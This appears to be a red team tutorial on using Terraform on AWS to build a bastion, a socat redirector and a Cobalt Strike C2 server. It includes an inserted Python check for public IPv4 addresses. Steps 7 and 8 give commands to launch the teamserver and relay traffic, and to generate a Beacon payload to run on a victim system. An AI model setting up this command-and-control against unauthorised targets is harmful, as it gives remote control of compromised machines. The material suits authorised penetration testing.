This guide documents using Terraform to build red team infrastructure, following the companion blog post on manual red team infrastructure setup. The repository lives at github.com/rbfp/redteam-infra.
Pre-Requisites
- An AWS account with access keys
- Terraform installed
- AWS CLI installed
Create an additional IAM user (terraform-redteam) with Power User permissions, disable its console login, and create access keys. Install Terraform and the AWS CLI on a Kali/Linux box:
$ sudo apt update
$ sudo apt install terraform
$ sudo apt install awscli
Step 0 - Download the GitHub Repo
Set up an SSH key with GitHub (docs), then clone:
$ git clone git@github.com:rbfp/redteam-infra.git
$ cd redteam-infra
Step 1 - Configure AWS CLI
Use a dedicated profile to keep credentials separate. Default region: us-west-2.
$ aws configure --profile redteam
Step 2 - Configure Region to Deploy
Run ./infra_setup.sh. It prompts for AWS profile, project name (e.g. redwest20), region, OS choice (Ubuntu recommended), and availability zones.
Step 3 - Terraform the Cloud
The automated Terraform commands execute, creating ~30 resources with auto-generated credentials:
- Bastion Host - user bastion, key {{ project_name }}-bastion.pem
- Redirector - user redirector, key {{ project_name }}-internal.pem
- C2 Server - user c2server, key {{ project_name }}-internal.pem
Step 4 - Verify Deployment
Use ./manage_aws.sh to start, stop, list instances, and check billing. Verify in the AWS Console that instances have no public IPv4 addresses, then test SSH through the bastion:
$ ssh -i ~/redteam_infra/build/{{ project_name }}-bastion.pem bastion@{{ bastion_ipv6 }}
$ ssh -i .ssh/internal.pem c2server@{{ c2_ipv4 }}
Step 5 - Cobalt Strike Install
Run ./cobalt_setup.sh to automate dependency install and file deployment. It prompts for the redirector IPv6, C2 server IPv4, redirector IPv4, project name, and the Cobalt Strike 7z password.
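The Step 4 check that no instance carries a public IPv4 address can also be run against CLI output instead of the console. This is an added example, not part of the redteam-infra repository; the sample JSON, instance IDs and Name tags are constructed, and it assumes input shaped like the output of aws ec2 describe-instances --output json.

```python
import json
import sys

# Constructed sample shaped like `aws ec2 describe-instances --output json`;
# instance IDs, Name tags and addresses are invented (documentation ranges).
SAMPLE = json.loads("""
{"Reservations": [{"Instances": [
  {"InstanceId": "i-0000000000000000a",
   "Tags": [{"Key": "Name", "Value": "example-bastion"}],
   "NetworkInterfaces": [
     {"Ipv6Addresses": [{"Ipv6Address": "2001:db8::10"}],
      "PrivateIpAddresses": [{"PrivateIpAddress": "10.0.1.10"}]}]},
  {"InstanceId": "i-0000000000000000b",
   "Tags": [{"Key": "Name", "Value": "example-c2server"}],
   "PublicIpAddress": "203.0.113.7",
   "NetworkInterfaces": [{"Association": {"PublicIp": "203.0.113.7"}}]},
  {"InstanceId": "i-0000000000000000c",
   "Tags": [{"Key": "Name", "Value": "example-redirector"}],
   "NetworkInterfaces": [
     {"PrivateIpAddresses": [{"PrivateIpAddress": "10.0.2.20"}]},
     {"PrivateIpAddresses": [{"PrivateIpAddress": "10.0.2.21",
                              "Association": {"PublicIp": "198.51.100.4"}}]}]}
]}]}
""")

def public_ipv4_findings(doc):
    """Map 'instance-id (Name)' -> sorted public IPv4s; empty dict means pass."""
    findings = {}
    for reservation in doc.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            ips = {inst.get("PublicIpAddress")}
            # An Elastic IP on a secondary interface or secondary private
            # address appears under the ENI, so walk every interface too.
            for eni in inst.get("NetworkInterfaces", []):
                ips.add(eni.get("Association", {}).get("PublicIp"))
                for addr in eni.get("PrivateIpAddresses", []):
                    ips.add(addr.get("Association", {}).get("PublicIp"))
            ips.discard(None)
            if ips:
                name = next((t["Value"] for t in inst.get("Tags", [])
                             if t["Key"] == "Name"), "untagged")
                findings[f'{inst["InstanceId"]} ({name})'] = sorted(ips)
    return findings


if __name__ == "__main__":
    doc = SAMPLE if sys.stdin.isatty() else json.load(sys.stdin)
    for inst, ips in public_ipv4_findings(doc).items():
        print(f"public IPv4 on {inst}: {', '.join(ips)}")
```

Pipe in the output of aws ec2 describe-instances --profile redteam --output json to check a live deployment; no output means no public IPv4 address was found.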
Step 7 - Cobalt Server Setup
Multiple concurrent terminal sessions are required.
On the C2 server:
$ chmod +x ./CS491/Server/teamserver ./CS491/Server/TeamServerImage
$ ./teamserver {{ c2_ipv4 }} {{ cobalt_server_pass }}
Attack box SSH tunnel:
$ ssh -i {{ project_name }}-bastion.pem -L 50050:{{ c2_ipv4 }}:50050 bastion@{{ bastion_ipv6 }}
Redirector traffic redirection:
$ sudo socat TCP6-LISTEN:443,reuseaddr,fork TCP4:{{ c2_ipv4 }}:443
Cobalt Strike client:
$ chmod +x ./cobaltstrike-client.sh
$ ./cobaltstrike-client.sh
Connect with host 127.0.0.1, port 50050.
Step 8 - Proof of Concept
Listener: name HTTPS, payload Beacon HTTPS, HTTPS hosts set to the redirector IPv6 (square-bracket encapsulated).
Payload: listener HTTPS, system call Indirect, HTTP library winhttp. Execute the resulting .exe on the victim system to establish the beacon callback.